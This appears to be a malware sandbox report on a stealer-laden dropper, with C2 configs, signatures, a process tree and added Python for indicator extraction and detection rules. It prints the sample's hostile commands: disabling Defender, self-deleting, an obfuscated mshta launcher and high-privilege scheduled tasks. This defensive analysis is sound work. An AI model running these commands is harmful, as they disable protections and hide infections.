Analysis

max time kernel:   7s
max time network:  151s
platform:          windows10_x64
resource:          win10-en-20211104
submitted:         21/11/2021, 13:56

Static task:      static1
Behavioral task:  behavioral1  (sample b0d129a1b07f3501b7737ae293cbba00.exe, resource win7-en-20211104)
Behavioral task:  behavioral2  (sample b0d129a1b07f3501b7737ae293cbba00.exe, resource win10-en-20211104)

General

Target:  b0d129a1b07f3501b7737ae293cbba00.exe
Size:    10.5MB
MD5:     b0d129a1b07f3501b7737ae293cbba00
SHA1:    fc48fab64bcbe7a62ad99f1899703ade98f07804
SHA256:  9ddc809e6e1d32f3c3b1fc1e5382fad699e6336a270bb91fef2a4c0e13f39d14
SHA512:  2deb70fb4f62bcbf3ecbd3a6205f4fd3dae51820be5ab973fc4367b90bef022c4cf5097e506c6c11d39193b8526756412a4f336b2303d305d15da6acc8f9b403
Malware Config

Extracted: socelars
  C2: http://www.gianninidesign.com/

Extracted: metasploit
  Payload: windows/single_exec

Extracted: redline
  Botnet: user2121
  C2: 135.181.129.119:4805

Extracted: vidar
  Version: 48.5
  Botnet (profile): 933
  C2: https://koyu.space/@tttaj
  profile_id: 933
  (koyu.space is a Mastodon instance; Vidar reads its real C2 address out of a social-network profile like this one, so the URL is a dead-drop resolver rather than the C2 itself. Block or hunt on the profile URL, not on the whole host.)

Extracted: smokeloader
  Version: 2020
  C2:
    http://membro.at/upload/
    http://jeevanpunetha.com/upload/
    http://misipu.cn/upload/
    http://zavodooo.ru/upload/
    http://targiko.ru/upload/
    http://vues3d.com/upload/

Extracted: redline
  Botnet: media17plus
  C2: 91.121.67.60:51630
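The six extracted configs above, normalised into one flat indicator list. This is an added example and not part of the sandbox report: the config values are copied from the report, while the family tags, the "scope" field (URL-level blocking for shared hosts such as the Mastodon instance) and the SHARED_HOSTS list are assumptions of mine.

```python
"""Turn the extracted malware configs into a de-duplicated network indicator list.

Added example, not sandbox output. EXTRACTED_CONFIGS is transcribed from the
report's "Malware Config" section; SHARED_HOSTS and the scope rule are my own.
"""
from urllib.parse import urlparse
import ipaddress

# Constructed from the report's "Malware Config" section.
EXTRACTED_CONFIGS = [
    {"family": "socelars", "c2": ["http://www.gianninidesign.com/"]},
    {"family": "metasploit", "payload": "windows/single_exec"},
    {"family": "redline", "botnet": "user2121", "c2": ["135.181.129.119:4805"]},
    {"family": "vidar", "version": "48.5", "profile_id": "933",
     "c2": ["https://koyu.space/@tttaj"]},
    {"family": "smokeloader", "version": "2020", "c2": [
        "http://membro.at/upload/", "http://jeevanpunetha.com/upload/",
        "http://misipu.cn/upload/", "http://zavodooo.ru/upload/",
        "http://targiko.ru/upload/", "http://vues3d.com/upload/"]},
    {"family": "redline", "botnet": "media17plus", "c2": ["91.121.67.60:51630"]},
]

# Legitimate multi-tenant services the malware only abuses (the Vidar "C2" is a
# Mastodon profile used as a dead-drop resolver). Assumption: operator-maintained.
SHARED_HOSTS = {"koyu.space"}

DEFAULT_PORTS = {"http": 80, "https": 443}


def parse_endpoint(raw):
    """Split a C2 string (URL or bare host:port) into (scheme, host, port, path)."""
    if "://" not in raw:
        raw = "tcp://" + raw          # bare ip:port as reported for RedLine
    u = urlparse(raw)
    port = u.port or DEFAULT_PORTS.get(u.scheme)
    return u.scheme, u.hostname, port, u.path or "/"


def network_iocs(configs=EXTRACTED_CONFIGS):
    """Return one dict per distinct (host, port, path) across all families."""
    seen, out = set(), []
    for cfg in configs:
        for raw in cfg.get("c2", []):
            scheme, host, port, path = parse_endpoint(raw)
            try:
                ipaddress.ip_address(host)
                kind = "ip"
            except ValueError:
                kind = "domain"
            key = (host, port, path)
            if key in seen:
                continue
            seen.add(key)
            out.append({
                "family": cfg["family"], "type": kind, "host": host, "port": port,
                "path": path, "scheme": scheme,
                # a shared host must be matched on the full URL, not the hostname
                "scope": "url" if host in SHARED_HOSTS else "host",
                "tag": cfg.get("botnet") or cfg.get("profile_id"),
            })
    return out


if __name__ == "__main__":
    for ioc in network_iocs():
        print(f'{ioc["family"]:12} {ioc["type"]:6} {ioc["scope"]:4} '
              f'{ioc["host"]}:{ioc["port"]}{ioc["path"]}  tag={ioc["tag"]}')
```

The Metasploit entry contributes no network indicator (windows/single_exec is a payload template, not a listener), and the two RedLine configs stay separate because their botnet tags differ; the tag is worth keeping in the IOC record since it distinguishes affiliates sharing one infrastructure.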
Signatures

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar. The extracted config above names the payload as windows/single_exec.

Process spawned unexpected child process (1 IoC)
This typically indicates the parent process was compromised via an exploit or macro.
  description | pid | pid_target | Process | procid_target
  Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 6448 | 1688 | rundll32.exe | 198
Caveat: PID 1688 is listed elsewhere in this report as a dropped wmiprvse.exe (Executes dropped EXE) and as Wed1292e7cced8ba.exe (process tree), so the "unexpected parent" may be a dropped or renamed binary rather than the genuine WMI provider host.

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.

RedLine Payload (5 IoCs)
  resource | yara_rule
  behavioral2/memory/592-289-0x0000000000400000-0x0000000000420000-memory.dmp | family_redline
  behavioral2/memory/1144-296-0x0000000000418F02-mapping.dmp | family_redline
  behavioral2/memory/1144-332-0x0000000004F30000-0x0000000005536000-memory.dmp | family_redline
  behavioral2/memory/1144-290-0x0000000000400000-0x0000000000420000-memory.dmp | family_redline
  behavioral2/memory/592-292-0x0000000000418F06-mapping.dmp | family_redline
Both hits are in memory, not on disk: PID 592 is the second instance of Wed12e5a6a551c39b62a.exe (spawned by PID 1600) and PID 1144 the second instance of Wed12d2139ce650c689.exe (spawned by PID 520), i.e. the children into which the stealer was injected.

SmokeLoader
Modular backdoor trojan in use since 2014.

Socelars Payload (2 IoCs)
  resource | yara_rule
  behavioral2/files/0x000400000001abc6-158.dat | family_socelars
  behavioral2/files/0x000400000001abc6-190.dat | family_socelars

Vidar Stealer (2 IoCs)
  resource | yara_rule
  behavioral2/memory/4944-378-0x0000000000400000-0x00000000004D8000-memory.dmp | family_vidar
  behavioral2/memory/4944-374-0x00000000021E0000-0x00000000022B5000-memory.dmp | family_vidar
PID 4944 is Worldoffer.exe in the process tree.

ASPack-packed dropped files (yara rule aspack_v212_v242, 6 IoCs)
  resource | yara_rule
  behavioral2/files/0x000600000001abb3-122.dat | aspack_v212_v242
  behavioral2/files/0x000600000001abb2-123.dat | aspack_v212_v242
  behavioral2/files/0x000600000001abb2-125.dat | aspack_v212_v242
  behavioral2/files/0x000600000001abb3-128.dat | aspack_v212_v242
  behavioral2/files/0x000400000001abbe-129.dat | aspack_v212_v242
  behavioral2/files/0x000400000001abbe-130.dat | aspack_v212_v242

Downloads MZ/PE file

Executes dropped EXE (15 IoCs)
  pid | Process
  4008 | setup_install.exe
  520 | AwTxlmCABrJz7EAdimlbFcu2.exe
  692 | Wed12f81f1ede1e.exe
  1388 | Wed123d89a91c256e57.exe
  1532 | Wed124bd92a370.exe
  1600 | Wed12e5a6a551c39b62a.exe
  1508 | Wed126a3d2b0eb7.exe
  1688 | wmiprvse.exe
  1764 | Wed129e9e1f612b5.exe
  1252 | Wed12f0ec01aa0d.exe
  1348 | Wed12640230114af0.exe
  2716 | Wed12f7252371e9b59.exe
  2492 | Wed12f0ec01aa0d.exe
  404 | Wed1245c5fe22f.exe
  3492 | Wed12581881318b9e75.exe

Loads dropped DLL (5 IoCs)
  pid | Process
  4008 | setup_install.exe (five loads; the DLL names are not reported)

Legitimate hosting services abused for malware hosting/C2 (1 TTP)
See the Vidar config above, whose C2 is a koyu.space (Mastodon) profile.

Looks up external IP address via web service (6 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
  flow | ioc
  29 | ip-api.com
  44 | ipinfo.io
  45 | ipinfo.io
  197 | ipinfo.io
  198 | ipinfo.io
  266 | ipinfo.io
These services are benign and widely used by legitimate software; treat them as a hunting pivot (which hosts query them right after an unknown executable starts), not as a block-list entry.

Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.

Suspicious use of SetThreadContext (1 IoC)
  description | pid | Process | procid_target
  PID 1252 set thread context of 2492 | 1252 | Wed12f0ec01aa0d.exe | 102
PID 2492 is a child of 1252 running the same image (Wed12f0ec01aa0d.exe /mixtwo); a same-image child whose thread context is rewritten by its parent is the process-hollowing pattern, and the child is the one that later spawns the taskkill/erase self-delete command.

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). The sandbox's generic description calls this likely ransomware behaviour; in this sample, which drops stealers rather than ransomware, drive enumeration is equally consistent with file harvesting.

Program crash (10 IoCs)
  pid | pid_target | Process | procid_target
  4412 | 516 | WerFault.exe | 126
  4572 | 3168 | WerFault.exe |
  5612 | 516 | WerFault.exe | 126
  4508 | 516 | WerFault.exe | 126
  5936 | 444 | WerFault.exe | 155
  2884 | 5580 | WerFault.exe | 158
  5588 | 516 | WerFault.exe | 126
  2872 | 516 | WerFault.exe | 126
  6692 | 516 | WerFault.exe | 126
  6080 | 4952 | WerFault.exe | 201
PID 516 (setup.exe) crashed six times; PID 3168 is the dropped chrome.exe and 4952 is "chrome update.exe".

Creates scheduled task(s) (1 TTP, 2 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
  pid | Process
  6840 | schtasks.exe
  2860 | schtasks.exe
Both tasks (see the process tree) run "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" as user Admin with /rl HIGHEST, one at logon and one hourly.

Kills process with taskkill (7 IoCs)
  pid | Process
  1200 | taskkill.exe
  6680 | taskkill.exe
  3784 | taskkill.exe
  6392 | taskkill.exe
  5012 | taskkill.exe
  5820 | taskkill.exe
  7628 | taskkill.exe
Two distinct uses appear in the tree: terminating the original dropped file after it has been copied and re-launched under a new name (1200, 3784, 5012, 7628), and killing chrome.exe (6392), which is consistent with a stealer releasing the browser's profile databases.

Runs ping.exe (1 TTP, 1 IoC)
  pid | Process
  6784 | PING.EXE  (ping youtube.com)

Suspicious use of AdjustPrivilegeToken (35 IoCs)
  Token | pid | Process
  SeDebugPrivilege | 1688 | wmiprvse.exe
  SeCreateTokenPrivilege, SeAssignPrimaryTokenPrivilege, SeLockMemoryPrivilege, SeIncreaseQuotaPrivilege, SeMachineAccountPrivilege, SeTcbPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeSystemEnvironmentPrivilege, SeChangeNotifyPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeSyncAgentPrivilege, SeEnableDelegationPrivilege, SeManageVolumePrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, plus five privileges reported only by LUID number (31 to 35) | 1508 | Wed126a3d2b0eb7.exe
The list for PID 1508 is the complete privilege set in LUID order, i.e. a blanket enable-every-privilege call rather than a targeted request; AdjustTokenPrivileges can only enable privileges the token already holds, so the effective gain depends on the account the sample runs under.

Suspicious use of WriteProcessMemory (64 IoCs)
Each CreateProcess-style write is logged three times in the raw data; the table lists distinct entries with their repeat count.
  pid | pid_target | Process | procid_target | count
  3576 | 4008 | b0d129a1b07f3501b7737ae293cbba00.exe | 69 | 3
  4008 | 4444 | setup_install.exe | 72 | 3
  4008 | 4340 | setup_install.exe | 73 | 3
  4444 | 4308 | cmd.exe | 74 | 3
  4340 | 524 | cmd.exe | 75 | 3
  4008 | 800 | setup_install.exe | 76 | 3
  4008 | 3172 | setup_install.exe | 77 | 3
  4008 | 3232 | setup_install.exe | 78 | 3
  4008 | 4488 | setup_install.exe | 84 | 3
  4008 | 3800 | setup_install.exe | 79 | 3
  4008 | 2852 | setup_install.exe | 80 | 3
  4008 | 4240 | setup_install.exe | 81 | 3
  4008 | 4100 | setup_install.exe | 82 | 3
  4008 | 3272 | setup_install.exe | 83 | 3
  4008 | 3160 | setup_install.exe | 91 | 3
  4488 | 520 | cmd.exe | 196 | 3
  4008 | 816 | setup_install.exe | 86 | 3
  4008 | 348 | setup_install.exe | 90 | 3
  3232 | 692 | cmd.exe | 87 | 3
  4008 | 1048 | setup_install.exe | 88 | 3
  4008 | 1196 | setup_install.exe | 89 | 3
  3172 | 1388 | cmd.exe | 115 | 1 (list truncated at 64 entries)
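Several of the signatures above can be re-derived from nothing more than the process tree and the SetThreadContext events. The following is an added example and not the sandbox's own rule logic: PROCESSES and SET_THREAD_CONTEXT are a hand-picked subset of this report's data, and the rule names, the UNEXPECTED_PARENTS and SUSPICIOUS_CHILDREN lists and the matching heuristics are my choices.

```python
"""Re-derive behavioural signatures from raw process telemetry.

Added example, not part of the sandbox report. Records below are transcribed
from the report's process tree and signature tables; the rules are my own.
"""
import re
from collections import namedtuple

Proc = namedtuple("Proc", "pid ppid image cmdline")
Finding = namedtuple("Finding", "rule pid detail")

# Constructed from the report: (pid, parent pid, image, command line).
# Command lines the report does not show are left empty.
PROCESSES = [
    Proc(3576, 0, r"C:\Users\Admin\AppData\Local\Temp\b0d129a1b07f3501b7737ae293cbba00.exe",
         r'"C:\Users\Admin\AppData\Local\Temp\b0d129a1b07f3501b7737ae293cbba00.exe"'),
    Proc(4008, 3576, r"C:\Users\Admin\AppData\Local\Temp\7zS8FD105A5\setup_install.exe",
         r'"C:\Users\Admin\AppData\Local\Temp\7zS8FD105A5\setup_install.exe"'),
    Proc(4444, 4008, r"C:\Windows\SysWOW64\cmd.exe",
         r"C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none "
         r"-NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true "
         r"-SubmitSamplesConsent NeverSend -MAPSReporting Disable"),
    Proc(4340, 4008, r"C:\Windows\SysWOW64\cmd.exe",
         r'C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none '
         r'-NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"'),
    Proc(1252, 800, r"C:\Users\Admin\AppData\Local\Temp\7zS8FD105A5\Wed12f0ec01aa0d.exe",
         "Wed12f0ec01aa0d.exe /mixtwo"),
    Proc(2492, 1252, r"C:\Users\Admin\AppData\Local\Temp\7zS8FD105A5\Wed12f0ec01aa0d.exe",
         "Wed12f0ec01aa0d.exe /mixtwo"),
    Proc(2636, 2492, r"C:\Windows\SysWOW64\cmd.exe",
         r'"C:\Windows\System32\cmd.exe" /c taskkill /im "Wed12f0ec01aa0d.exe" /f & erase '
         r'"C:\Users\Admin\AppData\Local\Temp\7zS8FD105A5\Wed12f0ec01aa0d.exe" & exit'),
    Proc(6840, 5940, r"C:\Windows\SysWOW64\schtasks.exe",
         r'schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" '
         r'/tn "PowerControl LG" /sc ONLOGON /rl HIGHEST'),
    # Parent/child pair from the "unexpected child process" signature row
    # (the report gives neither the rundll32 path nor the command lines).
    Proc(1688, 0, r"C:\Windows\system32\wbem\wmiprvse.exe", ""),
    Proc(6448, 1688, "rundll32.exe", ""),
]
# (source pid, target pid) from the SetThreadContext signature.
SET_THREAD_CONTEXT = [(1252, 2492)]

UNEXPECTED_PARENTS = {"wmiprvse.exe"}      # service hosts that rarely spawn shells/loaders
SUSPICIOUS_CHILDREN = {"rundll32.exe", "cmd.exe", "powershell.exe", "mshta.exe"}


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def rule_defender_tamper(p):
    c = p.cmdline.lower()
    if "set-mppreference" in c and "-disablerealtimemonitoring $true" in c:
        return [Finding("defender_realtime_disabled", p.pid, "Set-MpPreference -DisableRealtimeMonitoring $true")]
    m = re.search(r'add-mppreference\s+-exclusionpath\s+"?([^"]+)', p.cmdline, re.I)
    if m:
        return [Finding("defender_exclusion_added", p.pid, m.group(1).strip())]
    return []


def rule_self_delete(p, by_pid):
    """cmd.exe child that kills and erases its own parent's image."""
    c = p.cmdline.lower()
    parent = by_pid.get(p.ppid)
    if parent and "taskkill" in c and re.search(r"\b(erase|del)\b", c) and basename(parent.image) in c:
        return [Finding("self_delete_via_taskkill", p.pid, parent.image)]
    return []


def rule_hollowing(events, by_pid):
    """SetThreadContext from a parent into a child running the same image."""
    out = []
    for src, dst in events:
        s, d = by_pid.get(src), by_pid.get(dst)
        if s and d and d.ppid == src and s.image.lower() == d.image.lower():
            out.append(Finding("same_image_child_set_thread_context", src, f"{src} -> {dst} {d.image}"))
    return out


def rule_scheduled_task(p):
    if basename(p.image) != "schtasks.exe" or "/create" not in p.cmdline.lower():
        return []
    tr = re.search(r'/tr\s+"([^"]+)"', p.cmdline, re.I)
    rl = re.search(r"/rl\s+(\S+)", p.cmdline, re.I)
    sc = re.search(r"/sc\s+(\S+)", p.cmdline, re.I)
    if rl and rl.group(1).upper() == "HIGHEST":
        return [Finding("scheduled_task_highest", p.pid,
                        f"{sc.group(1) if sc else '?'} {tr.group(1) if tr else '?'}")]
    return []


def rule_unexpected_child(p, by_pid):
    parent = by_pid.get(p.ppid)
    if parent and basename(parent.image) in UNEXPECTED_PARENTS and basename(p.image) in SUSPICIOUS_CHILDREN:
        return [Finding("unexpected_child", p.pid, f"{basename(parent.image)} -> {basename(p.image)}")]
    return []


def run_rules(processes=PROCESSES, events=SET_THREAD_CONTEXT):
    by_pid = {p.pid: p for p in processes}
    findings = []
    for p in processes:
        findings += rule_defender_tamper(p)
        findings += rule_self_delete(p, by_pid)
        findings += rule_scheduled_task(p)
        findings += rule_unexpected_child(p, by_pid)
    findings += rule_hollowing(events, by_pid)
    return findings


if __name__ == "__main__":
    for f in run_rules():
        print(f"{f.rule:38} pid={f.pid:<6} {f.detail}")
```

The unexpected-child rule is the noisiest of the five: WMI provider host legitimately launches processes on behalf of management tooling (Win32_Process.Create), so in production it needs an allow-list of expected children rather than the bare parent name used here. The hollowing rule, by contrast, is low-noise: a parent rewriting the thread context of a freshly created child of its own image has almost no benign equivalent.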
Processes
-
C:\Users\Admin\AppData\Local\Temp\b0d129a1b07f3501b7737ae293cbba00.exe"C:\Users\Admin\AppData\Local\Temp\b0d129a1b07f3501b7737ae293cbba00.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3576 -
C:\Users\Admin\AppData\Local\Temp\7zS8FD105A5\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS8FD105A5\setup_install.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4008 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable3⤵
- Suspicious use of WriteProcessMemory
PID:4444 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable4⤵PID:4308
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"3⤵
- Suspicious use of WriteProcessMemory
PID:4340 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵PID:524
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed12f0ec01aa0d.exe /mixtwo3⤵PID:800
-
C:\Users\Admin\AppData\Local\Temp\7zS8FD105A5\Wed12f0ec01aa0d.exeWed12f0ec01aa0d.exe /mixtwo4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1252 -
C:\Users\Admin\AppData\Local\Temp\7zS8FD105A5\Wed12f0ec01aa0d.exeWed12f0ec01aa0d.exe /mixtwo5⤵
- Executes dropped EXE
PID:2492 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "Wed12f0ec01aa0d.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS8FD105A5\Wed12f0ec01aa0d.exe" & exit6⤵PID:2636
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "Wed12f0ec01aa0d.exe" /f7⤵
- Kills process with taskkill
PID:3784
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed123d89a91c256e57.exe3⤵
- Suspicious use of WriteProcessMemory
PID:3172 -
C:\Users\Admin\AppData\Local\Temp\7zS8FD105A5\Wed123d89a91c256e57.exeWed123d89a91c256e57.exe4⤵
- Executes dropped EXE
PID:1388
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed12f81f1ede1e.exe3⤵
- Suspicious use of WriteProcessMemory
PID:3232 -
C:\Users\Admin\AppData\Local\Temp\7zS8FD105A5\Wed12f81f1ede1e.exeWed12f81f1ede1e.exe4⤵
- Executes dropped EXE
PID:692 -
C:\Users\Admin\AppData\Local\Temp\is-QLT65.tmp\Wed12f81f1ede1e.tmp"C:\Users\Admin\AppData\Local\Temp\is-QLT65.tmp\Wed12f81f1ede1e.tmp" /SL5="$40138,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS8FD105A5\Wed12f81f1ede1e.exe"5⤵PID:2572
-
C:\Users\Admin\AppData\Local\Temp\7zS8FD105A5\Wed12f81f1ede1e.exe"C:\Users\Admin\AppData\Local\Temp\7zS8FD105A5\Wed12f81f1ede1e.exe" /SILENT6⤵PID:2860
-
C:\Users\Admin\AppData\Local\Temp\is-4VM97.tmp\Wed12f81f1ede1e.tmp"C:\Users\Admin\AppData\Local\Temp\is-4VM97.tmp\Wed12f81f1ede1e.tmp" /SL5="$50138,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS8FD105A5\Wed12f81f1ede1e.exe" /SILENT7⤵PID:1452
-
C:\Users\Admin\AppData\Local\Temp\is-PKGMK.tmp\winhostdll.exe"C:\Users\Admin\AppData\Local\Temp\is-PKGMK.tmp\winhostdll.exe" ss18⤵PID:3684
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed12640230114af0.exe3⤵PID:3800
-
C:\Users\Admin\AppData\Local\Temp\7zS8FD105A5\Wed12640230114af0.exeWed12640230114af0.exe4⤵
- Executes dropped EXE
PID:1348 -
C:\Users\Admin\AppData\Local\Temp\7zS8FD105A5\Wed12640230114af0.exe"C:\Users\Admin\AppData\Local\Temp\7zS8FD105A5\Wed12640230114af0.exe" -u5⤵PID:5084
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed126a3d2b0eb7.exe3⤵PID:2852
-
C:\Users\Admin\AppData\Local\Temp\7zS8FD105A5\Wed126a3d2b0eb7.exeWed126a3d2b0eb7.exe4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1508 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe5⤵PID:5804
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe6⤵
- Kills process with taskkill
PID:6392
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed124bd92a370.exe3⤵PID:4240
-
C:\Users\Admin\AppData\Local\Temp\7zS8FD105A5\Wed124bd92a370.exeWed124bd92a370.exe4⤵
- Executes dropped EXE
PID:1532
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed129e9e1f612b5.exe3⤵PID:4100
-
C:\Users\Admin\AppData\Local\Temp\7zS8FD105A5\Wed129e9e1f612b5.exeWed129e9e1f612b5.exe4⤵
- Executes dropped EXE
PID:1764
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed1292e7cced8ba.exe3⤵PID:3272
-
C:\Users\Admin\AppData\Local\Temp\7zS8FD105A5\Wed1292e7cced8ba.exeWed1292e7cced8ba.exe4⤵PID:1688
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"5⤵PID:4752
-
C:\Users\Admin\AppData\Local\Temp\Worldoffer.exe"C:\Users\Admin\AppData\Local\Temp\Worldoffer.exe"6⤵PID:4944
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"6⤵PID:516
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 516 -s 8087⤵
- Program crash
PID:4412
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 516 -s 8647⤵
- Program crash
PID:5612
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 516 -s 8727⤵
- Program crash
PID:4508
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 516 -s 9527⤵
- Program crash
PID:5588
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 516 -s 9287⤵
- Program crash
PID:2872
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 516 -s 9527⤵
- Program crash
PID:6692
-
-
-
C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"6⤵PID:4928
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )7⤵PID:4992
-
-
-
C:\Users\Admin\AppData\Local\Temp\guixiangli-game.exe"C:\Users\Admin\AppData\Local\Temp\guixiangli-game.exe"6⤵PID:612
-
-
C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"6⤵PID:4984
-
-
C:\Users\Admin\AppData\Local\Temp\chrome2.exe"C:\Users\Admin\AppData\Local\Temp\chrome2.exe"6⤵PID:1296
-
-
C:\Users\Admin\AppData\Local\Temp\chrome3.exe"C:\Users\Admin\AppData\Local\Temp\chrome3.exe"6⤵PID:1352
-
-
C:\Users\Admin\AppData\Local\Temp\chrome1.exe"C:\Users\Admin\AppData\Local\Temp\chrome1.exe"6⤵PID:2764
-
-
C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"6⤵PID:5312
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"7⤵PID:4012
-
-
-
C:\Users\Admin\AppData\Local\Temp\chrome update.exe"C:\Users\Admin\AppData\Local\Temp\chrome update.exe"6⤵PID:4952
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4952 -s 20047⤵
- Program crash
PID:6080
-
-
-
C:\Users\Admin\AppData\Local\Temp\inst1.exe"C:\Users\Admin\AppData\Local\Temp\inst1.exe"6⤵PID:3504
-
-
C:\Users\Admin\AppData\Local\Temp\PBrowserSetp42415.exe"C:\Users\Admin\AppData\Local\Temp\PBrowserSetp42415.exe"6⤵PID:1684
-
-
C:\Users\Admin\AppData\Local\Temp\chrome.exe"C:\Users\Admin\AppData\Local\Temp\chrome.exe"6⤵PID:3168
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed12d2139ce650c689.exe3⤵
- Suspicious use of WriteProcessMemory
PID:4488 -
C:\Users\Admin\AppData\Local\Temp\7zS8FD105A5\Wed12d2139ce650c689.exeWed12d2139ce650c689.exe4⤵PID:520
-
C:\Users\Admin\AppData\Local\Temp\7zS8FD105A5\Wed12d2139ce650c689.exeC:\Users\Admin\AppData\Local\Temp\7zS8FD105A5\Wed12d2139ce650c689.exe5⤵PID:1144
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed12f7252371e9b59.exe3⤵PID:816
-
C:\Users\Admin\AppData\Local\Temp\7zS8FD105A5\Wed12f7252371e9b59.exeWed12f7252371e9b59.exe4⤵
- Executes dropped EXE
PID:2716 -
C:\Users\Admin\AppData\Roaming\8144678.exe"C:\Users\Admin\AppData\Roaming\8144678.exe"5⤵PID:4364
-
-
C:\Users\Admin\AppData\Roaming\5546623.exe"C:\Users\Admin\AppData\Roaming\5546623.exe"5⤵PID:3860
-
C:\Users\Admin\AppData\Roaming\58542392\7839062778390627.exe"C:\Users\Admin\AppData\Roaming\58542392\7839062778390627.exe"6⤵PID:4532
-
-
-
C:\Users\Admin\AppData\Roaming\4233457.exe"C:\Users\Admin\AppData\Roaming\4233457.exe"5⤵PID:4888
-
-
C:\Users\Admin\AppData\Roaming\2547472.exe"C:\Users\Admin\AppData\Roaming\2547472.exe"5⤵PID:740
-
-
